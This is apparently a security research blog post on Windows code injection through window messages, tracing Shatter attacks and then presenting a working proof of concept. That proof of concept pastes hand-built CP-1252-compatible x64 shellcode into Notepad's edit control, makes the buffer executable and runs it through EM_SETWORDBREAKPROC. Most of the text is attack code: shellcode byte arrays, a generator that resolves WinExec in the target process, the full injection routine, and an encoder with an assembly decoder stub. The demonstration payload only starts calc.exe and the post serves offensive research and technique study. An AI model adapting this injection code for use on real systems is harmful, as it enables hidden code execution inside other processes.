‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.
Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.
ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.
For this post, I’ve written a PoC that does the following:
Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.
Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.
To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:”s -u %1 %2 \”modexp\””. This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.
To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.
hw = FindWindow("Notepad", NULL); hw = FindWindowEx(hw, NULL, "Edit", NULL); emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); printf("EM Handle : %p\n", emh);
The handle points to the buffer allocated for input as you can see in Figure 3.
Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.
NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g “\x00\x00”
If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.
Throughout the code, you’ll see the following.
"\x00\x4d\x00" /* add byte [rbp], cl */
Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.
Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.
; ************************* prolog mov al, 0 enter 256, 0 ; save rbp push rbp add [rbp], al ; create local variable for rbp push 0 push rsp add [rbp], al pop rbp add [rbp], cl
If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.
EDITWORDBREAKPROCA EDITWORDBREAKPROCA; int EDITWORDBREAKPROCA( LPSTR lpch, int ichCurrent, int cch, int code ) {...}
If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.
PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.
"\x6a\x00" /* push 0 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.
"\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x2d\x00\xff\x00\xff" /* sub eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.
"\xb8\x00\xff\x00\xff" /* mov eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\xff\x00\xff" /* xor eax, 0xff00ff00 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.
"\xb8\x00\xfe\x00\xfe" /* mov eax, 0xfe00fe00 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x25\x00\x01\x00\x01" /* and eax, 0x01000100 */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x01" /* mov byte [eax], 1 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. POP RCX loads X into the RCX register. LOOP $+2 decreases RCX by 1 leaving -1. PUSH RCX stores -1 on the stack and POP RAX sets RAX to -1.
"\x6a\x00" /* push 0 */ "\x59" /* pop rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xe2\x00" /* loop $+2 */ "\x34\x00" /* xor al, 0 */ "\x51" /* push rcx */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */
PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. IMUL EAX, DWORD[RAX], -1 multiplies X by -1 and stores the result in EAX.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x6b\x00\xff" /* imul eax, dword [rax], -1 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x59" /* pop rcx */
Initializing registers to 0, 1 or -1 is not a problem, as you can see from the above examples. Loading arbitrary data is a bit trickier, but you can get creative with some aproaches.
Let’s take for example setting EAX to 0x12345678.
"\xb8\x78\x56\x34\x12" /* mov eax, 0x12345678 */
This uses IMUL to set EAX to 0x00340078 and an XOR with 0x12005600 to finish it off.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xff\x00" /* inc dword [rax] */ "\x69\x00\x78\x00\x34\x00" /* imul eax, dword [rax], 0x340078 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */
Create a local variable we’ll call X, by storing 0 on the stack. Create a local variable we’ll call A, which contains the address of X . Load A into RAX. Store 0x00340078 in X using MOV DWORD[RAX], 0x00340078. Load X into RAX. XOR EAX with 0x12005600. EAX now contains 0x12345678.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc7\x00\x78\x00\x34\x00" /* mov dword [rax], 0x340078 */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Another way using Rotate Left (ROL).
"\x68\x00\x78\x00\x34" /* push 0x34007800 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x18" /* rol dword [rax], 0x18 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x35\x00\x56\x00\x12" /* xor eax, 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */
Another example using MOV and ROL.
"\x68\x00\x56\x00\x12" /* push 0x12005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x78" /* mov byte [rax], 0x78 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x10" /* rol dword [rax], 0x10 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc6\x00\x34" /* mov byte [rax], 0x34 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xc1\x00\x10" /* rol dword [rax], 0x10 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
Final example uses MOV, ADD, SCASB with the address of buffer stored in RDI.
"\x6a\x00" /* push 0 */ "\x54" /* push rsp */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x5f" /* pop rdi */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb8\x00\x12\x00\xff" /* mov eax, 0xff001200 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xbb\x00\x34\x00\xff" /* mov ebx, 0xff003400 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xb9\x00\x56\x00\xff" /* mov ecx, 0xff005600 */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xba\x00\x78\x00\xff" /* mov edx, 0xff007800 */ "\x00\x27" /* add byte [rdi], ah */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x3f" /* add byte [rdi], bh */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x2f" /* add byte [rdi], ch */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\xae" /* scasb */ "\x00\x37" /* add byte [rdi], dh */ "\x00\x4d\x00" /* add byte [rbp], cl */ "\x58" /* pop rax */ "\x00\x4d\x00" /* add byte [rbp], cl */
If all you need are two byte instructions that contain one null byte, the following may be considered. For the branch instructions, regardless of whether a condition is true or false, the instruction is always branching to the next address. The loop instructions might be useful if you want to subtract 1 from an address. To add 1 or 4 to an address, copy it to RDI and use SCASB or SCASD. LODSB or LODSD can be used too if the address is in RSI, but just remember they overwrite AL and EAX respectively.
; logic or al, 0 xor al, 0 and al, 0 ; arithmetic add al, 0 adc al, 0 sbb al, 0 sub al, 0 ; comparison predicates cmp al, 0 test al, 0 ; data transfer mov al, 0 mov ah, 0 mov bl, 0 mov bh, 0 mov cl, 0 mov ch, 0 mov dl, 0 mov dh, 0 ; branches jmp $+2 jo $+2 jno $+2 jb $+2 jae $+2 je $+2 jne $+2 jbe $+2 ja $+2 js $+2 jns $+2 jp $+2 jnp $+2 jl $+2 jge $+2 jle $+2 jg $+2 jrcxz $+2 loop $+2 loope $+2 loopne $+2
Some of these prefixes can be used to pad an instruction. The only instructions I tested were 8-Bit operations.
Prefix | Description |
---|---|
0x2E, 0x3E | Branch hints have no effect on anything newer than a Pentium 4. Harmless to use up a byte of space between instructions. |
0xF0 | The LOCK prefix guarantees the instruction has exclusive use of all shared memory, until the instruction completes execution. |
0xF2, 0xF3 | REP(0xF2) tells the CPU to repeat execution of a string manipulation instruction like MOVS, STOS, CMPS or SCAS until RCX is zero. REPNE (0xF3) repeats execution until RCX is zero or the Zero Flag (ZF) is cleared. |
0x26, 0x2E, 0x36, 0x3E, 0x64, 0x65 | The Extra Segment (ES) (0x26) prefix is used for the destination of string operations. The Code Segment (CS) (0x2E) for all instructions is the same as a branch hint and has no effect. The Stack Segment (0x36) is used for storing and loading local variables with instructions like PUSH/POP. The Data Segment (DS) (0x3E) for all data references, except stack and is also the same as a branch hint, which has no effect. FS(0x64) and GS(0x65) are not designated, but you’ll see them used to access the Thread Environment Block (TEB) on Windows or the Thread Local Storage (TLS) on Linux. |
0x66, 0x67 | Used to override the default size of a data type in 32-bit mode for a PUSH/POP or MOV. NASM/YASM support operand-size (0x66) and operand-address (0x67) prefixes using a16, a32, o16 and o32. |
0x40 – 0x4F | REX prefixes for 64-Bit mode. |
Some things to consider when writing your own.
Some API will use SIMD instructions, usually for memcpy() or memset() of small blocks of data. To achieve optimal performance, the data accessed must be aligned by 16 bytes. If the stack pointer is misaligned and SIMD instructions are used to read or write to SP, this will result in an unhandled exception. Since we can’t use a CALL instruction, RET is used instead and once executed removes an API address from the stack. If it’s not aligned by 16 bytes at that point, expect trouble! 🙂
Using previous examples, the following code will construct a CP-1252 compatible shellcode to execute calc.exe using kernel32!WinExec(). This is simply to demonstrate the injection via notepads edit control works.
// the max address for virtual memory on // windows is (2 ^ 47) - 1 or 0x7FFFFFFFFFFF #define MAX_ADDR 6 // only useful for CP_ACP codepage static int is_cp1252_allowed(int ch) { // zero is allowed, but we can't use it for the clipboard if(ch == 0) return 0; // bytes converted to double byte characters if(ch >= 0x80 && ch <= 0x8C) return 0; if(ch >= 0x91 && ch <= 0x9C) return 0; return (ch != 0x8E && ch != 0x9E && ch != 0x9F); } // Allocate 64-bit buffer on the stack. // Then place the address in RDI for writing. #define STORE_ADDR_SIZE 10 char STORE_ADDR[] = { /* 0000 */ "\x6a\x00" /* push 0 */ /* 0002 */ "\x54" /* push rsp */ /* 0003 */ "\x00\x5d\x00" /* add byte [rbp], cl */ /* 0006 */ "\x5f" /* pop rdi */ /* 0007 */ "\x00\x5d\x00" /* add byte [rbp], cl */ }; // Load an 8-Bit immediate value into AH #define LOAD_BYTE_SIZE 5 char LOAD_BYTE[] = { /* 0000 */ "\xb8\x00\xff\x00\x4d" /* mov eax, 0x4d00ff00 */ }; // Subtract 32 from AH #define SUB_BYTE_SIZE 8 char SUB_BYTE[] = { /* 0000 */ "\x00\x5d\x00" /* add byte [rbp], cl */ /* 0003 */ "\x2d\x00\x20\x00\x5d" /* sub eax, 0x4d002000 */ }; // Store AH in buffer and advance RDI by 1 #define STORE_BYTE_SIZE 9 char STORE_BYTE[] = { /* 0000 */ "\x00\x27" /* add byte [rdi], ah */ /* 0002 */ "\x00\x5d\x00" /* add byte [rbp], cl */ /* 0005 */ "\xae" /* scasb */ /* 0006 */ "\x00\x5d\x00" /* add byte [rbp], cl */ }; // Transfers control of execution to kernel32!WinExec #define RET_SIZE 2 char RET[] = { /* 0000 */ "\xc3" /* ret */ /* 0002 */ "\x00" }; #define CALC3_SIZE 164 #define RET_OFS 0x20 + 2 char CALC3[] = { /* 0000 */ "\xb0\x00" /* mov al, 0 */ /* 0002 */ "\xc8\x00\x01\x00" /* enter 0x100, 0 */ /* 0006 */ "\x55" /* push rbp */ /* 0007 */ "\x00\x45\x00" /* add byte [rbp], al */ /* 000A */ "\x6a\x00" /* push 0 */ /* 000C */ "\x54" /* push rsp */ /* 000D */ "\x00\x45\x00" /* add byte [rbp], al */ /* 0010 */ "\x5d" /* pop rbp */ /* 0011 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0014 */ "\x57" /* push rdi */ /* 0015 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0018 */ "\x56" /* push rsi */ /* 0019 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 001C */ "\x53" /* push rbx */ /* 001D */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0020 */ "\xb8\x00\x4d\x00\xff" /* mov eax, 0xff004d00 */ /* 0025 */ "\x00\xe1" /* add cl, ah */ /* 0027 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 002A */ "\xb8\x00\x01\x00\xff" /* mov eax, 0xff000100 */ /* 002F */ "\x00\xe5" /* add ch, ah */ /* 0031 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0034 */ "\x51" /* push rcx */ /* 0035 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0038 */ "\x5b" /* pop rbx */ /* 0039 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 003C */ "\x6a\x00" /* push 0 */ /* 003E */ "\x54" /* push rsp */ /* 003F */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0042 */ "\x5f" /* pop rdi */ /* 0043 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0046 */ "\x57" /* push rdi */ /* 0047 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 004A */ "\x59" /* pop rcx */ /* 004B */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 004E */ "\x6a\x00" /* push 0 */ /* 0050 */ "\x54" /* push rsp */ /* 0051 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0054 */ "\x58" /* pop rax */ /* 0055 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0058 */ "\xc7\x00\x63\x00\x6c\x00" /* mov dword [rax], 0x6c0063 */ /* 005E */ "\x58" /* pop rax */ /* 005F */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0062 */ "\x35\x00\x61\x00\x63" /* xor eax, 0x63006100 */ /* 0067 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 006A */ "\xab" /* stosd */ /* 006B */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 006E */ "\x6a\x00" /* push 0 */ /* 0070 */ "\x54" /* push rsp */ /* 0071 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0074 */ "\x58" /* pop rax */ /* 0075 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0078 */ "\xc6\x00\x05" /* mov byte [rax], 5 */ /* 007B */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 007E */ "\x5a" /* pop rdx */ /* 007F */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0082 */ "\x53" /* push rbx */ /* 0083 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0086 */ "\x6a\x00" /* push 0 */ /* 0088 */ "\x6a\x00" /* push 0 */ /* 008A */ "\x6a\x00" /* push 0 */ /* 008C */ "\x6a\x00" /* push 0 */ /* 008E */ "\x6a\x00" /* push 0 */ /* 0090 */ "\x53" /* push rbx */ /* 0091 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0094 */ "\x90" /* nop */ /* 0095 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0098 */ "\x90" /* nop */ /* 0099 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 009C */ "\x90" /* nop */ /* 009D */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 00A0 */ "\x90" /* nop */ /* 00A1 */ "\x00\x4d\x00" /* add byte [rbp], cl */ }; #define CALC4_SIZE 79 #define RET_OFS2 0x18 + 2 char CALC4[] = { /* 0000 */ "\x59" /* pop rcx */ /* 0001 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0004 */ "\x59" /* pop rcx */ /* 0005 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0008 */ "\x59" /* pop rcx */ /* 0009 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 000C */ "\x59" /* pop rcx */ /* 000D */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0010 */ "\x59" /* pop rcx */ /* 0011 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0014 */ "\x59" /* pop rcx */ /* 0015 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0018 */ "\xb8\x00\x4d\x00\xff" /* mov eax, 0xff004d00 */ /* 001D */ "\x00\xe1" /* add cl, ah */ /* 001F */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0022 */ "\x51" /* push rcx */ /* 0023 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0026 */ "\x58" /* pop rax */ /* 0027 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 002A */ "\xc6\x00\xc3" /* mov byte [rax], 0xc3 */ /* 002D */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0030 */ "\x59" /* pop rcx */ /* 0031 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0034 */ "\x5b" /* pop rbx */ /* 0035 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0038 */ "\x5e" /* pop rsi */ /* 0039 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 003C */ "\x5f" /* pop rdi */ /* 003D */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0040 */ "\x59" /* pop rcx */ /* 0041 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 0044 */ "\x6a\x00" /* push 0 */ /* 0046 */ "\x58" /* pop rax */ /* 0047 */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 004A */ "\x5c" /* pop rsp */ /* 004B */ "\x00\x4d\x00" /* add byte [rbp], cl */ /* 004E */ "\x5d" /* pop rbp */ }; static u8* cp1252_generate_winexec(int pid, int *cslen) { int i, ofs, outlen; u8 *cs, *out; HMODULE m; w64_t addr; // it won't exceed 512 bytes out = (u8*)cs = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // initialize parameters for WinExec() memcpy(out, CALC3, CALC3_SIZE); out += CALC3_SIZE; // initialize RDI for writing memcpy(out, STORE_ADDR, STORE_ADDR_SIZE); out += STORE_ADDR_SIZE; // *********************************** // store kernel32!WinExec on stack m = GetModuleHandle("kernel32"); addr.q = ((PBYTE)GetProcAddress(m, "WinExec") - (PBYTE)m); m = GetProcessModuleHandle(pid, "kernel32.dll"); addr.q += (ULONG_PTR)m; for(i=0; i<MAX_ADDR; i++) { // load a byte into AH memcpy(out, LOAD_BYTE, LOAD_BYTE_SIZE); out[2] = addr.b[i]; // if byte not allowed for CP1252, add 32 if(!is_cp1252_allowed(out[2])) { out[2] += 32; // subtract 32 from byte at runtime memcpy(&out[LOAD_BYTE_SIZE], SUB_BYTE, SUB_BYTE_SIZE); out += SUB_BYTE_SIZE; } out += LOAD_BYTE_SIZE; // store AH in [RDI], increment RDI memcpy(out, STORE_BYTE, STORE_BYTE_SIZE); out += STORE_BYTE_SIZE; } // calculate length of constructed code ofs = (int)(out - (u8*)cs) + 2; // first offset cs[RET_OFS] = (uint8_t)ofs; memcpy(out, RET, RET_SIZE); out += RET_SIZE; memcpy(out, CALC4, CALC4_SIZE); // second offset ofs = CALC4_SIZE; ((u8*)out)[RET_OFS2] = (uint8_t)ofs; out += CALC4_SIZE; outlen = ((int)(out - (u8*)cs) + 1) & -2; // convert to ascii for(i=0; i<=outlen; i+=2) { cs[i/2] = cs[i]; } *cslen = outlen / 2; // return pointer to code return cs; }
The following steps are used.
BOOL em_inject(void) { HWND npw, ecw; w64_t emh, lastbuf, embuf; SIZE_T rd; HANDLE hp; DWORD cslen, pid, old; BOOL r; PBYTE cs; char buf[1024]; // get window handle for notepad class npw = FindWindow("Notepad", NULL); // get window handle for edit control ecw = FindWindowEx(npw, NULL, "Edit", NULL); // get the EM handle for the edit control emh.p = (PVOID)SendMessage(ecw, EM_GETHANDLE, 0, 0); // get the process id for the window GetWindowThreadProcessId(ecw, &pid); // open the process for reading and changing memory permissions hp = OpenProcess(PROCESS_VM_READ | PROCESS_VM_OPERATION, FALSE, pid); // copy some test data to the clipboard memset(buf, 0x4d, sizeof(buf)); CopyToClipboard(CF_TEXT, buf, sizeof(buf)); // loop until target buffer address is stable lastbuf.p = NULL; r = FALSE; for(;;) { // read the address of input buffer ReadProcessMemory(hp, emh.p, &embuf.p, sizeof(ULONG_PTR), &rd); // Address hasn't changed? exit loop if(embuf.p == lastbuf.p) { r = TRUE; break; } // save this address lastbuf.p = embuf.p; // clear the contents of edit control SendMessage(ecw, EM_SETSEL, 0, -1); SendMessage(ecw, WM_CLEAR, 0, 0); // send the WM_PASTE message to the edit control // allow notepad some time to read the data from clipboard SendMessage(ecw, WM_PASTE, 0, 0); Sleep(WAIT_TIME); } if(r) { // set buffer to RWX VirtualProtectEx(hp, embuf.p, 4096, PAGE_EXECUTE_READWRITE, &old); // generate shellcode and copy to clipboard cs = cp1252_generate_winexec(pid, &cslen); CopyToClipboard(CF_TEXT, cs, cslen); // clear buffer and inject shellcode SendMessage(ecw, EM_SETSEL, 0, -1); SendMessage(ecw, WM_CLEAR, 0, 0); SendMessage(ecw, WM_PASTE, 0, 0); Sleep(WAIT_TIME); // set the word break procedure to address of shellcode and execute SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)embuf.p); SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a); SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL); // set buffer to RW VirtualProtectEx(hp, embuf.p, 4096, PAGE_READWRITE, &old); } CloseHandle(hp); return r; }
Notepad doesn’t crash as a result of the shellcode running. The demo terminates it once the thread ends.
Encoding data and code require different solutions. Raw data that doesn’t execute requires “bad characters” removed from it, while code must execute successfully after the conversion, which is not easy to accomplish in practice. The following encoding and decoding algorithms are based on a previous post about removing null characters in shellcode.
// encode raw data to CP-1252 compatible data static void cp1252_encode(FILE *in, FILE *out) { uint8_t c, t; for(;;) { // read byte c = getc(in); // end of file? exit if(feof(in)) break; // if the result of c + 1 is disallowed if(!is_decoder_allowed(c + 1)) { // write escape code putc(0x01, out); // save byte XOR'd with the 8-Bit key putc(c ^ CP1252_KEY, out); } else { // save byte plus 1 putc(c + 1, out); } } }
// decode data processed with cp1252_encode to their original values static void cp1252_decode(FILE *in, FILE *out) { uint8_t c, t; for(;;) { // read byte c = getc(in); // end of file? exit if(feof(in)) break; // if this is an escape code if(c == 0x01) { // read next byte c = getc(in); // XOR the 8-Bit key putc(c ^ CP1252_KEY, out); } else { // save byte minus one putc(c - 1, out); } } }
The assembly is compatible with both 32 and 64-bit mode of the x86 architecture.
; cp1252 decoder in 40 bytes of x86/amd64 assembly ; presumes to be executing in RWX memory ; needs stack allocation if executing from RX memory ; ; odzhan bits 32 %define CP1252_KEY 0x4D jmp init_decode ; read the program counter ; esi = source ; edi = destination ; ecx = length decode_bytes: lodsb ; read a byte dec al ; c - 1 jnz save_byte lodsb ; skip null byte lodsb ; read next byte xor al, CP1252_KEY ; c ^= CP1252_KEY save_byte: stosb ; save in buffer lodsb ; skip null byte loop decode_bytes ret load_data: pop esi ; esi = start of data ; ********************** ; decode the 32-bit length read_len: push 0 ; len = 0 push esp ; pop edi ; edi = &len push 4 ; 32-bits pop ecx call decode_bytes pop ecx ; ecx = len ; ********************** ; decode remainder of data push esi ; pop edi ; edi = encoded data push esi ; save address for RET jmp decode_bytes init_decode: call load_data ; CP1252 encoded data goes here..
The decoder could be stored at the beginning of the buffer and the callback could be stored higher up in memory.
I’d like to thank Adam for feedback and advice on this post. Specifically about CF_UNICODETEXT.
List of papers and presentations relevant to this post. If you know of any good papers on writing Unicode shellcodes that aren’t listed here, feel free to email me with the details.
What follows are just some bits of code that were considered, but not used in the end. Explanations are provided for why they were discarded.
The first one tries to set EAX to 0. Set AL and AH to 0. Then extend AX to EAX using CWDE. Unfortunately 0x98 can’t be used.
"\xb0\x00" /* mov al, 0 */ "\x00\x4d\x00" /* add byte [ebp], cl */ "\xb4\x00" /* mov ah, 0 */ "\x00\x4d\x00" /* add byte [ebp], cl */ "\x98" /* cwde */
